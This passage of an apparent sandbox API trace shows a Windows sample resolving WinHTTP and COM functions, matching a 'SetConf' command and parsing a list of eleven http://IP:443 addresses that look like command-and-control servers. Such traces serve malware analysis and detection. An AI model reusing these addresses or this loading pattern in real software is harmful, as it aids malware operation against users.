(hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.044] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoInitializeEx") returned 0x7ffb27e62c50 [0190.044] ResetEvent (hEvent=0x8) returned 1 [0190.045] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.049] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoUninitialize") returned 0x7ffb27e61540 [0190.049] ResetEvent (hEvent=0x8) returned 1 [0190.049] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.051] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoInitializeSecurity") returned 0x7ffb27e35fe0 [0190.051] ResetEvent (hEvent=0x8) returned 1 [0190.051] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.058] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x7ffb288f0000 [0190.061] ResetEvent (hEvent=0x8) returned 1 [0190.061] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.063] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x9) returned 0x7ffb2897c230 [0190.063] ResetEvent (hEvent=0x8) returned 1 [0190.063] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.065] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x8) returned 0x7ffb2897cbc0 [0190.065] ResetEvent (hEvent=0x8) returned 1 [0190.065] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.067] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x14) returned 0x7ffb28908820 [0190.067] ResetEvent (hEvent=0x8) returned 1 [0190.068] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.070] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x13) returned 0x7ffb28908350 [0190.070] ResetEvent (hEvent=0x8) returned 1 [0190.070] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.074] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x19) returned 0x7ffb28901bd0 [0190.074] ResetEvent (hEvent=0x8) returned 1 [0190.074] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.076] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x2) returned 0x7ffb289009f0 [0190.076] ResetEvent (hEvent=0x8) returned 1 [0190.077] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.078] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x6) returned 0x7ffb28900ae0 [0190.079] ResetEvent (hEvent=0x8) returned 1 [0190.079] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.081] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0xc) returned 0x7ffb288fb120 [0190.081] ResetEvent (hEvent=0x8) returned 1 [0190.081] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.083] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0x5e) returned 0x7ffb28958280 [0190.083] ResetEvent (hEvent=0x8) returned 1 [0190.083] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.085] GetProcAddress (hModule=0x7ffb288f0000, lpProcName=0xb9) returned 0x7ffb289053e0 [0190.085] ResetEvent (hEvent=0x8) returned 1 [0190.085] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.090] LoadLibraryW (lpLibFileName="WINHTTP.dll") returned 0x7ffb21040000 [0190.092] ResetEvent (hEvent=0x8) returned 1 [0190.092] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.097] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpOpenRequest") returned 0x7ffb210592e0 [0190.097] ResetEvent (hEvent=0x8) returned 1 [0190.097] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.100] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpSetTimeouts") returned 0x7ffb21054fe0 [0190.100] ResetEvent (hEvent=0x8) returned 1 [0190.100] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.104] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpOpen") returned 0x7ffb21059890 [0190.104] ResetEvent (hEvent=0x8) returned 1 [0190.104] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.107] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpCloseHandle") returned 0x7ffb21064420 [0190.107] ResetEvent (hEvent=0x8) returned 1 [0190.107] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.110] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpConnect") returned 0x7ffb21074680 [0190.110] ResetEvent (hEvent=0x8) returned 1 [0190.110] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpQueryHeaders") returned 0x7ffb21062f60 [0190.113] ResetEvent (hEvent=0x8) returned 1 [0190.113] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.116] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpReceiveResponse") returned 0x7ffb21075170 [0190.116] ResetEvent (hEvent=0x8) returned 1 [0190.116] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.121] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpSendRequest") returned 0x7ffb21072390 [0190.121] ResetEvent (hEvent=0x8) returned 1 [0190.121] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.123] GetProcAddress (hModule=0x7ffb21040000, lpProcName="WinHttpSetOption") returned 0x7ffb21062be0 [0190.123] ResetEvent (hEvent=0x8) returned 1 [0190.123] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.126] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x7ffb28b00000 [0190.126] ResetEvent (hEvent=0x8) returned 1 [0190.126] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.129] GetProcAddress (hModule=0x7ffb28b00000, lpProcName="RtlFreeHeap") returned 0x7ffb28b204c0 [0190.129] ResetEvent (hEvent=0x8) returned 1 [0190.129] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.132] GetProcAddress (hModule=0x7ffb28b00000, lpProcName="RtlAllocateHeap") returned 0x7ffb28b252d0 [0190.132] ResetEvent (hEvent=0x8) returned 1 [0190.132] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.137] GetProcAddress (hModule=0x7ffb28b00000, lpProcName="RtlReAllocateHeap") returned 0x7ffb28b239f0 [0190.137] ResetEvent (hEvent=0x8) returned 1 [0190.137] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.140] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x7ffb262e0000 [0190.140] ResetEvent (hEvent=0x8) returned 1 [0190.140] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.144] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrFormatByteSizeW") returned 0x7ffb262fbc00 [0190.144] ResetEvent (hEvent=0x8) returned 1 [0190.144] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.147] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrA") returned 0x7ffb262f5cc0 [0190.147] ResetEvent (hEvent=0x8) returned 1 [0190.147] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.150] LoadLibraryW (lpLibFileName="ACTIVEDS.dll") returned 0x7ffb126f0000 [0190.174] ResetEvent (hEvent=0x8) returned 1 [0190.174] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.177] GetProcAddress (hModule=0x7ffb126f0000, lpProcName=0x9) returned 0x7ffb12711ca0 [0190.177] ResetEvent (hEvent=0x8) returned 1 [0190.177] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.186] ResetEvent (hEvent=0x8) returned 1 [0190.186] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.191] GetProcessHeap () returned 0x530000 [0190.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x605700 [0190.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x70) returned 0x60c150 [0190.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x180001490, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xcff00 | out: lpThreadId=0xcff00*=0x1388) returned 0x15c [0190.191] ResetEvent (hEvent=0x8) returned 1 [0190.191] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.407] lstrcmpiA (lpString1="SetConf", lpString2="SetConf") returned 0 [0190.411] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x60df30 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615840 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x300) returned 0x60e150 [0190.412] StrStrA (lpFirst="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.412] StrStrA (lpFirst="http://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.412] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df42, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617b10 [0190.412] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df42, cbMultiByte=24, lpWideCharStr=0x617b10, cchWideChar=24 | out: lpWideCharStr="http://195.39.233.29:443") returned 24 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615500 [0190.412] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617b10) returned 1 [0190.412] StrStrA (lpFirst="\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.412] StrStrA (lpFirst="http://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.412] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df6f, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x6179d0 [0190.412] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df6f, cbMultiByte=26, lpWideCharStr=0x6179d0, cchWideChar=26 | out: lpWideCharStr="http://178.151.205.154:443") returned 26 [0190.412] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615520 [0190.412] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x6179d0) returned 1 [0190.412] StrStrA (lpFirst="\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] StrStrA (lpFirst="http://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df9e, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x6185c0 [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60df9e, cbMultiByte=23, lpWideCharStr=0x6185c0, cchWideChar=23 | out: lpWideCharStr="http://103.239.6.30:443") returned 23 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x6155e0 [0190.413] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x6185c0) returned 1 [0190.413] StrStrA (lpFirst="\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] StrStrA (lpFirst="http://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60dfca, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617cd0 [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60dfca, cbMultiByte=24, lpWideCharStr=0x617cd0, cchWideChar=24 | out: lpWideCharStr="http://109.87.143.67:443") returned 24 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615600 [0190.413] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617cd0) returned 1 [0190.413] StrStrA (lpFirst="\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] StrStrA (lpFirst="http://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60dff7, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617f50 [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60dff7, cbMultiByte=25, lpWideCharStr=0x617f50, cchWideChar=25 | out: lpWideCharStr="http://178.182.254.64:443") returned 25 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615620 [0190.413] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617f50) returned 1 [0190.413] StrStrA (lpFirst="\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] StrStrA (lpFirst="http://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e025, cbMultiByte=22, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x618050 [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e025, cbMultiByte=22, lpWideCharStr=0x618050, cchWideChar=22 | out: lpWideCharStr="http://77.252.26.5:443") returned 22 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x6156a0 [0190.413] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x618050) returned 1 [0190.413] StrStrA (lpFirst="\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] StrStrA (lpFirst="http://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e050, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0190.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617e50 [0190.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e050, cbMultiByte=24, lpWideCharStr=0x617e50, cchWideChar=24 | out: lpWideCharStr="http://91.232.241.58:443") returned 24 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615700 [0190.414] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617e50) returned 1 [0190.414] StrStrA (lpFirst="\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] StrStrA (lpFirst="http://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e07d, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617850 [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e07d, cbMultiByte=25, lpWideCharStr=0x617850, cchWideChar=25 | out: lpWideCharStr="http://182.160.98.250:443") returned 25 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615720 [0190.414] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617850) returned 1 [0190.414] StrStrA (lpFirst="\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] StrStrA (lpFirst="http://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e0ab, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617f90 [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e0ab, cbMultiByte=24, lpWideCharStr=0x617f90, cchWideChar=24 | out: lpWideCharStr="http://79.110.193.67:443") returned 24 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615aa0 [0190.414] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617f90) returned 1 [0190.414] StrStrA (lpFirst="\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] StrStrA (lpFirst="http://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="\r\nhttp://91.191.55.135:443\r\n\r\n" [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e0d8, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x617f50 [0190.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60e0d8, cbMultiByte=25, lpWideCharStr=0x617f50, cchWideChar=25 | out: lpWideCharStr="http://182.160.99.205:443") returned 25 [0190.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x615bc0 [0190.414] RtlFreeHeap (HeapHandle=0x530000, Flags=0x8, BaseAddress=0x617f50) returned 1 [0190.414] StrStrA (lpFirst="\r\nhttp://91.191.55.135:443\r\n\r\n", lpSrch="") returned="http://91.191.55.135:443\r\n\r\n" [0190.414] StrStrA 